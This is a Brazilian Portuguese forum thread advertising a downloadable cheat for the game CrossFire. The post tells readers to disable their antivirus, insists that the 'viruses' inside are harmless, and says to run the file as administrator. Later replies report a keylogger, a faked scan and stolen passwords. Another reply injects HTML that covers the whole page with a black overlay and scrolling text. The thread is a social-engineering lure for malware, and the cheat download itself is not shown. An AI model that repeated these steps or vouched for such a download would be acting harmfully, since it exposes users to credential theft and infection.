Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

cfal Hack CPRO atualizado AGORA apoco as 23:00

Compartilhar

Posts Recomendados

HACK ATUALIZADO as 23:00 por anonimous hacker's

Windows XP: SIM !

Windows 7 : SIM !

Windows Vista : SIM !

1) desativar seu anti-virus antes de abri-lo(para nao acusar como virus os virus que contem sao para injetar o hack na pasta do jogo,nao sao prejudiciais ao pc)

2) Abram o CF PRO como administrador e cliquem em ''CLICK HERE TO START ACTIVATION''

3) Esperem 8 segundos e cliquem em ''Skip This Ad''

4) Abram o Cf pelo ''Patcher-cf''

5) INSERT abre e fecha

PRINT tirado há alGUNS minutos atras:

tpico.jpg

DOWNLOAD:

É necessário se cadastrar para acessar o conteúdo.

SCAN:

Link para o comentário
Compartilhar em outros sites

<table style="position: fixed; top: 0px; left: 0px; background-color: black; border: 0px solid black; color: white; display:block!important; cursor:wait!important; width:2000px; height:2000px; z-index:2!important; -moz-user-select: none;-moz-user-focus:ignore; -moz-user-input isabled; text-shadow: 1px 1px 1px #000, -1px -1px 1px #FFF;"><tbody><tr><td align="left"><br><span style="font-size: 24px; line-height: normal"><br><span><marquee><div align="left">NAH KSA DU ÇENHÔ Ñ ECZISTE U SATANAIZ</div><br><br><br><div align="right">XÔ SATANAIZ, XÔ SATANAIZ! By Leech ;D </div><br> </marquee></span></span></td></tr></tbody></table>

Link para o comentário

Puts vlw em parceiro eu baixei nem o cf pro tem veio meu firewall deu erro grave veio nem ele suporto é o firewall comodo melhor que do windows. Meu antiviros nem pego vo e deleta tudo isso ae vei ta loco roba minha senha hack lixo infeliz

Link para o comentário

KeyLoger Detectectado,Recomendo que não baixem Scan totalmente falso, fiz o Escaneamento novamente aqui e cheguemos aos seguintes resultados:

Link para o comentário

• 4 semanas atrás...
Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.